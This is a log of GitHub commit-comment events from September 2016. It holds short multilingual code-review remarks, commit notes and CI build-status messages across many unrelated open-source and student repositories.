{"id":"4616269859","type":"CommitCommentEvent","actor":{"login":"Stibbons"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19168705,"position":19,"line":213,"path":"docs/submitting-applications.md","commit_id":"7db55faa70ebbd157e9ef0ee678bd972c2b5c32a","created_at":"2016-09-26T07:55:29Z","updated_at":"2016-09-26T07:55:29Z","body":"I propose this file to be transmitted through the normal \"--files\" and let just this setting be \"which is the name of the requirements.txt file to use\"."}},"created_at":"2016-09-26T07:55:29Z"}
{"id":"4616274805","type":"CommitCommentEvent","actor":{"login":"beardbig"},"repo":{"name":"beardbig/INSPIRE-notebooks"},"payload":{"comment":{"id":19168717,"position":null,"line":null,"path":null,"commit_id":"e8de83f87f851cbd584f09c940c43b056e20cfe9","created_at":"2016-09-26T07:56:46Z","updated_at":"2016-09-26T07:56:46Z","body":"MEEO - ED data server description added\r\n"}},"created_at":"2016-09-26T07:56:46Z"}
{"id":"4616280332","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168731,"position":5,"line":49,"path":"Harekaze/ViewControllers/Common/CommonProgramTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T07:58:09Z","updated_at":"2016-09-26T07:58:09Z","body":"Apply snack bar style"}},"created_at":"2016-09-26T07:58:09Z"}
{"id":"4616285152","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/dmd-testsuite"},"payload":{"comment":{"id":19168739,"position":15,"line":142,"path":"Makefile","commit_id":"015c9ac4c90757c68091ca357c61d0627ae8463e","created_at":"2016-09-26T07:59:22Z","updated_at":"2016-09-26T07:59:22Z","body":"So in this case, `gdb4181` would NOT be ignored, right?"}},"created_at":"2016-09-26T07:59:22Z"}
{"id":"4616287447","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168743,"position":2,"line":2,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T07:59:58Z","updated_at":"2016-09-26T07:59:58Z","body":"I used font-size 10px, because later is easier for me multiply 10px * XYZrem and i know, that e.g 1.4rem is 14px. For me it is easier than e.g font-size: 16px * 1.4rem = eee yyyy 22,4px... But i don't know it is good practice..."}},"created_at":"2016-09-26T07:59:58Z"}
{"id":"4616287904","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168745,"position":170,"line":215,"path":"Harekaze/ViewControllers/Common/CommonProgramTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:00:04Z","updated_at":"2016-09-26T08:00:04Z","body":"Fix"}},"created_at":"2016-09-26T08:00:04Z"}
{"id":"4616287911","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19168746,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-26T08:00:04Z","updated_at":"2016-09-26T08:00:04Z","body":"awwe <3"}},"created_at":"2016-09-26T08:00:04Z"}
{"id":"4616288382","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19168747,"position":null,"line":null,"path":null,"commit_id":"0375f104a3fed81f77e2150728d1a7ef040064c0","created_at":"2016-09-26T08:00:09Z","updated_at":"2016-09-26T08:00:09Z","body":"ref: #3156 "}},"created_at":"2016-09-26T08:00:09Z"}
{"id":"4616289685","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19168750,"position":939,"line":939,"path":"ryu/app/rest_vtep.py","commit_id":"76816b7668f139515e1afa0cca11965785eadece","created_at":"2016-09-26T08:00:25Z","updated_at":"2016-09-26T08:00:25Z","body":"備忘\r\n\r\nself.simple_switch --> self.app"}},"created_at":"2016-09-26T08:00:25Z"}
{"id":"4616289938","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19168751,"position":null,"line":null,"path":null,"commit_id":"b093e8296af5cbea16f5d2abab9c8475df9a5d05","created_at":"2016-09-26T08:00:28Z","updated_at":"2016-09-26T08:00:28Z","body":"ref: #3156"}},"created_at":"2016-09-26T08:00:28Z"}
{"id":"4616291985","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19168755,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-26T08:00:57Z","updated_at":"2016-09-26T08:00:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1158](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14218&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T08:00:57Z"}
{"id":"4616292938","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168757,"position":15,"line":15,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:01:11Z","updated_at":"2016-09-26T08:01:11Z","body":"I used autoprefixer: `https://autoprefixer.github.io/` but now i know what you mean."}},"created_at":"2016-09-26T08:01:11Z"}
{"id":"4616294391","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19168758,"position":null,"line":null,"path":null,"commit_id":"3367c4a6ef81d42be665dbc36177b75a937cf262","created_at":"2016-09-26T08:01:33Z","updated_at":"2016-09-26T08:01:33Z","body":"okay"}},"created_at":"2016-09-26T08:01:33Z"}
{"id":"4616300115","type":"CommitCommentEvent","actor":{"login":"WayneHarris"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19168771,"position":null,"line":null,"path":null,"commit_id":"76db1006cca54f0364b313bef604ac59c5f9b1f0","created_at":"2016-09-26T08:02:58Z","updated_at":"2016-09-26T08:02:58Z","body":"@neindk I've tested with vue-resource 1.0.3 and can also confirm it's working as expected.\r\n\r\nIf you console.log the ```request.headers.``` are you getting the same as @craigpaul showed?"}},"created_at":"2016-09-26T08:02:58Z"}
{"id":"4616300354","type":"CommitCommentEvent","actor":{"login":"Gyoo"},"repo":{"name":"VeteranSoftware/NowLiveBot"},"payload":{"comment":{"id":19168772,"position":256,"line":242,"path":"src/main/java/ws/discord/DiscordController.java","commit_id":"37e65466f6058cee4d3ff04796934152ab70f5ed","created_at":"2016-09-26T08:03:03Z","updated_at":"2016-09-26T08:03:03Z","body":"Better safe than sorry indeed, but from my experience, Hibernate's cascading does the job well."}},"created_at":"2016-09-26T08:03:03Z"}
{"id":"4616301379","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19168779,"position":6,"line":708,"path":"modules/s3/s3aaa.py","commit_id":"d0038ecc8268ad73dddb69619f102fccbfc86573","created_at":"2016-09-26T08:03:18Z","updated_at":"2016-09-26T08:03:18Z","body":"Yeah, I mean ```settings.register_onaccept``` of course ;) fix pushed."}},"created_at":"2016-09-26T08:03:18Z"}
{"id":"4616302511","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168782,"position":29,"line":29,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:03:36Z","updated_at":"2016-09-26T08:03:36Z","body":"Well...probably most used is open sans... it should be in `html `tag?"}},"created_at":"2016-09-26T08:03:36Z"}
{"id":"4616303657","type":"CommitCommentEvent","actor":{"login":"TinMarkovic"},"repo":{"name":"TinMarkovic/ChartsXBlock"},"payload":{"comment":{"id":19168786,"position":null,"line":null,"path":null,"commit_id":"9eff112a6f8a27dd708593dd42b3468e128a6200","created_at":"2016-09-26T08:03:54Z","updated_at":"2016-09-26T08:03:54Z","body":"Sve se čini ok, neki dijelovi koda bi mogli biti napisani malo elegantnije, ali nije bitno dovoljno za duženje priče. Idi dalje na sljedeće issue :+1:"}},"created_at":"2016-09-26T08:03:54Z"}
{"id":"4616305700","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168792,"position":30,"line":30,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:04:26Z","updated_at":"2016-09-26T08:04:26Z","body":"Okay, i will remember this\r\n"}},"created_at":"2016-09-26T08:04:26Z"}
{"id":"4616306567","type":"CommitCommentEvent","actor":{"login":"DerouineauNicolas"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168797,"position":24,"line":3318,"path":"applications/mp4box/main.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-26T08:04:40Z","updated_at":"2016-09-26T08:04:40Z","body":"Agreed !"}},"created_at":"2016-09-26T08:04:40Z"}
{"id":"4616306570","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/docs"},"payload":{"comment":{"id":19168798,"position":28,"line":28,"path":"docs/internals/javascript_css_build.md","commit_id":"d502e90cf1b17e80bc117c806bae7750e46ff4a6","created_at":"2016-09-26T08:04:40Z","updated_at":"2016-09-26T08:04:40Z","body":"Agreed on locking down version, totally … JavaScript ecosystem is just awful.\r\n\r\nMy concern, and it is just a minor one, is that people will be confused with expecting something that doesn't exist in the listed version."}},"created_at":"2016-09-26T08:04:40Z"}
{"id":"4616308817","type":"CommitCommentEvent","actor":{"login":"liuwei2058"},"repo":{"name":"liuwei2058/heidou"},"payload":{"comment":{"id":19168802,"position":null,"line":null,"path":null,"commit_id":"7b6c6b0633146ec31ee56e570568fd4ef2993706","created_at":"2016-09-26T08:05:14Z","updated_at":"2016-09-26T08:05:14Z","body":"1234"}},"created_at":"2016-09-26T08:05:14Z"}
{"id":"4616309941","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168805,"position":125,"line":154,"path":"Harekaze/ViewControllers/Recordings/ProgramDetailTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:05:31Z","updated_at":"2016-09-26T08:05:31Z","body":"Fix"}},"created_at":"2016-09-26T08:05:31Z"}
{"id":"4616310132","type":"CommitCommentEvent","actor":{"login":"ubeydullahmusab"},"repo":{"name":"egitimorganization/StuLessonApp"},"payload":{"comment":{"id":19168806,"position":2,"line":2,"path":"Ogrenci.java","commit_id":"c5f2648a77fca09c74092e598c17b3653cc56173","created_at":"2016-09-26T08:05:34Z","updated_at":"2016-09-26T08:05:34Z","body":"i\r\n"}},"created_at":"2016-09-26T08:05:34Z"}
{"id":"4616312008","type":"CommitCommentEvent","actor":{"login":"DerouineauNicolas"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19168808,"position":75,"line":9343,"path":"src/isomedia/box_code_base.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-26T08:06:02Z","updated_at":"2016-09-26T08:06:02Z","body":"Agreed !"}},"created_at":"2016-09-26T08:06:02Z"}
{"id":"4616313411","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168810,"position":79,"line":79,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:06:25Z","updated_at":"2016-09-26T08:06:25Z","body":"Hmm, i don't know. Why not?\r\nIt should be expressed (wyrażone) in percentage of device width / height?"}},"created_at":"2016-09-26T08:06:25Z"}
{"id":"4616314478","type":"CommitCommentEvent","actor":{"login":"ramit-mitra"},"repo":{"name":"ramit-mitra/my-Codebox"},"payload":{"comment":{"id":19168811,"position":null,"line":null,"path":null,"commit_id":"a2f6d4e6b4aae495a832fec2837df8ce0e5b0c58","created_at":"2016-09-26T08:06:43Z","updated_at":"2016-09-26T08:06:43Z","body":"vhosting skeleton for symfony 2.8 using localhost:80"}},"created_at":"2016-09-26T08:06:43Z"}
{"id":"4616321560","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168820,"position":363,"line":410,"path":"Harekaze/ViewControllers/Recordings/ProgramDetailTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:08:33Z","updated_at":"2016-09-26T08:08:33Z","body":"Use better way"}},"created_at":"2016-09-26T08:08:33Z"}
{"id":"4616323759","type":"CommitCommentEvent","actor":{"login":"13758172072"},"repo":{"name":"13758172072/caojing"},"payload":{"comment":{"id":19168826,"position":null,"line":null,"path":null,"commit_id":"b3b6822e2ad1f654b50d7aee013ed0ec0e8a13dc","created_at":"2016-09-26T08:09:08Z","updated_at":"2016-09-26T08:09:08Z","body":"text"}},"created_at":"2016-09-26T08:09:08Z"}
{"id":"4616325567","type":"CommitCommentEvent","actor":{"login":"zlc921022"},"repo":{"name":"saiwu-bigkoo/Android-ConvenientBanner"},"payload":{"comment":{"id":19168830,"position":null,"line":null,"path":null,"commit_id":"367443155450b9efa2db0aee74a977e3fb878098","created_at":"2016-09-26T08:09:35Z","updated_at":"2016-09-26T08:09:35Z","body":"刷新调用notifyDataSetChanged这个方法，不知是不是没有刷新到还是怎么的 会包数据刷新 没有更新adapter的错误"}},"created_at":"2016-09-26T08:09:35Z"}
{"id":"4616326200","type":"CommitCommentEvent","actor":{"login":"wmarques"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19168831,"position":null,"line":null,"path":null,"commit_id":"c1ebbbb09889c60f49fa7f2dc5fbd539168fa230","created_at":"2016-09-26T08:09:45Z","updated_at":"2016-09-26T08:09:45Z","body":"@deepu105 Was checking this on friday, I would have done the same. Too bad we can't load an html template as we did before..."}},"created_at":"2016-09-26T08:09:45Z"}
{"id":"4616329322","type":"CommitCommentEvent","actor":{"login":"Gerry1135"},"repo":{"name":"CYBUTEK/KerbalEngineer"},"payload":{"comment":{"id":19168841,"position":50,"line":50,"path":"KerbalEngineer/Flight/Readouts/Rendezvous/TargetLatitude.cs","commit_id":"155d68117a98248b62633f22912eac8b46e36c50","created_at":"2016-09-26T08:10:31Z","updated_at":"2016-09-26T08:10:31Z","body":"Not seen it display wrong but I think this should probably be Clamp180 or it won't give south values.  E.g. for 10 deg south it will read 350 deg north."}},"created_at":"2016-09-26T08:10:31Z"}
{"id":"4616330076","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168843,"position":7,"line":107,"path":"Harekaze/ViewControllers/Root/NavigationDrawerTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:10:42Z","updated_at":"2016-09-26T08:10:42Z","body":"remove as NSIndexPath"}},"created_at":"2016-09-26T08:10:42Z"}
{"id":"4616330346","type":"CommitCommentEvent","actor":{"login":"cxcorp"},"repo":{"name":"zeroniv/lapio-galleria"},"payload":{"comment":{"id":19168844,"position":null,"line":null,"path":null,"commit_id":"54cce2a245def1ddb53aedef82499d5c6ec1870e","created_at":"2016-09-26T08:10:45Z","updated_at":"2016-09-26T08:10:45Z","body":"Muokattu template.json kannattais viellä siirtää profiles kansioon ja nimetä oman nickin mukaan ( ͡° ͜ʖ ͡°)"}},"created_at":"2016-09-26T08:10:45Z"}
{"id":"4616330920","type":"CommitCommentEvent","actor":{"login":"Altaf-Mahdi"},"repo":{"name":"lg-devs/proprietary_vendor_lge"},"payload":{"comment":{"id":19168845,"position":null,"line":null,"path":null,"commit_id":"42754beef8991e7ea188df2062f75a85ab08eb0c","created_at":"2016-09-26T08:10:54Z","updated_at":"2016-09-26T08:10:54Z","body":"That's fine, thanks."}},"created_at":"2016-09-26T08:10:54Z"}
{"id":"4616331226","type":"CommitCommentEvent","actor":{"login":"zlc921022"},"repo":{"name":"saiwu-bigkoo/Android-ConvenientBanner"},"payload":{"comment":{"id":19168846,"position":null,"line":null,"path":null,"commit_id":"367443155450b9efa2db0aee74a977e3fb878098","created_at":"2016-09-26T08:10:59Z","updated_at":"2016-09-26T08:10:59Z","body":"应该说这是一个bug吧  刷新偶尔会出这个问题，不是每次，有时间可以帮忙看下不"}},"created_at":"2016-09-26T08:10:59Z"}
{"id":"4616332057","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168849,"position":39,"line":181,"path":"Harekaze/ViewControllers/Root/NavigationDrawerTableViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:11:12Z","updated_at":"2016-09-26T08:11:12Z","body":"remove as NSIndexPath"}},"created_at":"2016-09-26T08:11:12Z"}
{"id":"4616332967","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168850,"position":114,"line":163,"path":"Harekaze/ViewControllers/Settings/ChinachuWUISelectionViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:11:26Z","updated_at":"2016-09-26T08:11:26Z","body":"remove as NSIndexPath"}},"created_at":"2016-09-26T08:11:26Z"}
{"id":"4616333099","type":"CommitCommentEvent","actor":{"login":"sapegin"},"repo":{"name":"sapegin/react-styleguidist"},"payload":{"comment":{"id":19168853,"position":6,"line":6,"path":"src/utils/markdown-to-jsx.js","commit_id":"f7401bcd4c18eabe643d005aa6421319e69016cd","created_at":"2016-09-26T08:11:28Z","updated_at":"2016-09-26T08:11:28Z","body":"I’m going to send more pull requests because I don’t like copypasting modules ;-)"}},"created_at":"2016-09-26T08:11:28Z"}
{"id":"4616333443","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168854,"position":92,"line":92,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:11:34Z","updated_at":"2016-09-26T08:11:34Z","body":"I don't know, because this two img have different width.\r\nI will check how make it better."}},"created_at":"2016-09-26T08:11:34Z"}
{"id":"4616335161","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19168859,"position":13,"line":204,"path":"mailbox/maildir/src/main/java/org/apache/james/mailbox/maildir/MaildirFolder.java","commit_id":"827b0336fe7d3816416453da4a7b71a79009f6d9","created_at":"2016-09-26T08:12:00Z","updated_at":"2016-09-26T08:12:00Z","body":"why ?"}},"created_at":"2016-09-26T08:12:00Z"}
{"id":"4616335966","type":"CommitCommentEvent","actor":{"login":"MilkXu"},"repo":{"name":"MilkXu/github_study"},"payload":{"comment":{"id":19168864,"position":null,"line":null,"path":null,"commit_id":"044ee1132eace14f1c763ab3c47357028d73ad23","created_at":"2016-09-26T08:12:12Z","updated_at":"2016-09-26T08:12:12Z","body":"\r\nupdate on Sep.26.2016"}},"created_at":"2016-09-26T08:12:12Z"}
{"id":"4616341997","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168873,"position":110,"line":110,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:13:37Z","updated_at":"2016-09-26T08:13:37Z","body":"Okay, convincing argument, i get it."}},"created_at":"2016-09-26T08:13:37Z"}
{"id":"4616343076","type":"CommitCommentEvent","actor":{"login":"kadala"},"repo":{"name":"php-amqplib/RabbitMqBundle"},"payload":{"comment":{"id":19168876,"position":null,"line":null,"path":null,"commit_id":"9255b76eaa5980a4f10f66d2b8e9bfcc04bcf9e2","created_at":"2016-09-26T08:13:54Z","updated_at":"2016-09-26T08:13:54Z","body":"@skafandri Thank you to tag. to draw recover this modif"}},"created_at":"2016-09-26T08:13:54Z"}
{"id":"4616346831","type":"CommitCommentEvent","actor":{"login":"Emillychang"},"repo":{"name":"Emillychang/task01"},"payload":{"comment":{"id":19168883,"position":null,"line":null,"path":null,"commit_id":"dcbf79f901e12888415c08ec897a6231b4dc2f19","created_at":"2016-09-26T08:14:50Z","updated_at":"2016-09-26T08:14:50Z","body":"1.尝试完成task0001-7任务\r\n2.就酱"}},"created_at":"2016-09-26T08:14:50Z"}
{"id":"4616348286","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168886,"position":181,"line":181,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:15:10Z","updated_at":"2016-09-26T08:15:10Z","body":"Yup, probably yes :)"}},"created_at":"2016-09-26T08:15:10Z"}
{"id":"4616349228","type":"CommitCommentEvent","actor":{"login":"Tom94"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":19168888,"position":15,"line":51,"path":"osu.Framework/Graphics/Performance/FpsDisplay.cs","commit_id":"de6add6a2d741dfa98b358dbf3b17275913d7721","created_at":"2016-09-26T08:15:22Z","updated_at":"2016-09-26T08:15:22Z","body":"I think we should use a time-based decay here as well instead of a frame-based one. The frame-based one will always converge slower at smaller framerates, which doesn't make sense."}},"created_at":"2016-09-26T08:15:22Z"}
{"id":"4616350142","type":"CommitCommentEvent","actor":{"login":"arron2312"},"repo":{"name":"arron2312/wdcp-docker"},"payload":{"comment":{"id":19168891,"position":null,"line":null,"path":null,"commit_id":"051fc798e99f037ec31c9b16b0f8193c4d5a1a3a","created_at":"2016-09-26T08:15:35Z","updated_at":"2016-09-26T08:15:35Z","body":"1"}},"created_at":"2016-09-26T08:15:35Z"}
{"id":"4616351977","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19168895,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-26T08:16:03Z","updated_at":"2016-09-26T08:16:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1158](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14218&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:15:06"}},"created_at":"2016-09-26T08:16:03Z"}
{"id":"4616352322","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19168899,"position":null,"line":null,"path":null,"commit_id":"4922d00dfe5df7e147b9bbffde80d5de9e936ef8","created_at":"2016-09-26T08:16:08Z","updated_at":"2016-09-26T08:16:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1159](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14219&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T08:16:08Z"}
{"id":"4616352780","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168900,"position":64,"line":208,"path":"Harekaze/ViewControllers/Recordings/VideoPlayerViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:16:15Z","updated_at":"2016-09-26T08:16:15Z","body":"change to .normal ?"}},"created_at":"2016-09-26T08:16:15Z"}
{"id":"4616354371","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"eaCe/redaxo-boilerplate"},"payload":{"comment":{"id":19168904,"position":5,"line":5,"path":"templates/01 - default/template.php","commit_id":"1eaf50ea87a9f1762fcce0c7227dff14c8c8d1f6","created_at":"2016-09-26T08:16:37Z","updated_at":"2016-09-26T08:16:37Z","body":"Meinst du hier nicht `REX_TEMPLATE`?"}},"created_at":"2016-09-26T08:16:37Z"}
{"id":"4616361021","type":"CommitCommentEvent","actor":{"login":"daschl"},"repo":{"name":"couchbaselabs/java-dcp-client"},"payload":{"comment":{"id":19168921,"position":null,"line":null,"path":null,"commit_id":"d0989645442840ecc53cb94c08518812cbc30c3e","created_at":"2016-09-26T08:18:13Z","updated_at":"2016-09-26T08:18:13Z","body":"is this just cosmetical or does it have actual impact?"}},"created_at":"2016-09-26T08:18:13Z"}
{"id":"4616362705","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"eaCe/redaxo-boilerplate"},"payload":{"comment":{"id":19168925,"position":29,"line":29,"path":"templates/03 - navigation/template.php","commit_id":"1eaf50ea87a9f1762fcce0c7227dff14c8c8d1f6","created_at":"2016-09-26T08:18:39Z","updated_at":"2016-09-26T08:18:39Z","body":"Hier stimmt was nicht. Du schließt `</li>` immer, öffnest es aber nur, wenn die Kategorie online ist.\r\nÜbrigens: mit `rex_category::getRootCategories(true)` (beachte das `true`) kannst du auch direkt nur die Online-Kategorien abfragen, dann sparst du dir das `if` ;)"}},"created_at":"2016-09-26T08:18:39Z"}
{"id":"4616363897","type":"CommitCommentEvent","actor":{"login":"jinye96"},"repo":{"name":"jinye96/san_project"},"payload":{"comment":{"id":19168931,"position":null,"line":null,"path":null,"commit_id":"3f3742e22272d77bf5d6ec3d99cb575e401433cd","created_at":"2016-09-26T08:18:56Z","updated_at":"2016-09-26T08:18:56Z","body":"시범사항\r\n"}},"created_at":"2016-09-26T08:18:56Z"}
{"id":"4616366445","type":"CommitCommentEvent","actor":{"login":"eaCe"},"repo":{"name":"eaCe/redaxo-boilerplate"},"payload":{"comment":{"id":19168940,"position":5,"line":5,"path":"templates/01 - default/template.php","commit_id":"1eaf50ea87a9f1762fcce0c7227dff14c8c8d1f6","created_at":"2016-09-26T08:19:33Z","updated_at":"2016-09-26T08:19:33Z","body":"Ähh ja, danke :D"}},"created_at":"2016-09-26T08:19:33Z"}
{"id":"4616370064","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168950,"position":18,"line":58,"path":"Harekaze/ViewControllers/Root/NavigationDrawerTableViewController.swift","commit_id":"af844f8f38f379392247ce179cd3302b61aafac0","created_at":"2016-09-26T08:20:24Z","updated_at":"2016-09-26T08:20:24Z","body":"remove UITableViewCellSeparatorStyle"}},"created_at":"2016-09-26T08:20:24Z"}
{"id":"4616371914","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168953,"position":280,"line":280,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:20:54Z","updated_at":"2016-09-26T08:20:54Z","body":"Hmm, because background-box-first and second are square like a .gallery picture, and it is under this image and it is rotate \"background\" for this image"}},"created_at":"2016-09-26T08:20:54Z"}
{"id":"4616374045","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168959,"position":61,"line":99,"path":"Harekaze/ViewControllers/Root/NavigationDrawerTableViewController.swift","commit_id":"af844f8f38f379392247ce179cd3302b61aafac0","created_at":"2016-09-26T08:21:24Z","updated_at":"2016-09-26T08:21:24Z","body":"remove as NSIndexPath"}},"created_at":"2016-09-26T08:21:24Z"}
{"id":"4616377565","type":"CommitCommentEvent","actor":{"login":"avsej"},"repo":{"name":"couchbaselabs/java-dcp-client"},"payload":{"comment":{"id":19168964,"position":null,"line":null,"path":null,"commit_id":"d0989645442840ecc53cb94c08518812cbc30c3e","created_at":"2016-09-26T08:22:14Z","updated_at":"2016-09-26T08:22:14Z","body":"it will have actual impact on high sequence numbers as they always 64-bit"}},"created_at":"2016-09-26T08:22:14Z"}
{"id":"4616382236","type":"CommitCommentEvent","actor":{"login":"Ranlvor"},"repo":{"name":"freifunktrier/Supernodes"},"payload":{"comment":{"id":19168975,"position":null,"line":null,"path":null,"commit_id":"da2db2f79f87f7ec402c2942ee258dd8b1d06d05","created_at":"2016-09-26T08:23:19Z","updated_at":"2016-09-26T08:23:19Z","body":"Ich will kleine Netzgrößen abfangen. Kleine Netze haben größere Prefixe. Konkret hatten viele Announcements der größe /128 Probleme gemacht, sind aber erst 2 Checks weiter, beim ROA, aufgefallen und haben demnach die „falsche“ Fehlermeldung geloggt."}},"created_at":"2016-09-26T08:23:19Z"}
{"id":"4616394956","type":"CommitCommentEvent","actor":{"login":"SunnyGiner"},"repo":{"name":"DEIT2014/team2exercise"},"payload":{"comment":{"id":19168991,"position":null,"line":null,"path":null,"commit_id":"2d6afbd3498c4942ffd8164e8dfc72847b3b17c5","created_at":"2016-09-26T08:26:16Z","updated_at":"2016-09-26T08:26:16Z","body":"这个代码更新里的dart文件纯属用于实验，方便写css的潘晨煜同学修改，后面专门负责dart部分的王冰倩同学会写此项目的完整的dart文件（怕误解，说明一下）"}},"created_at":"2016-09-26T08:26:16Z"}
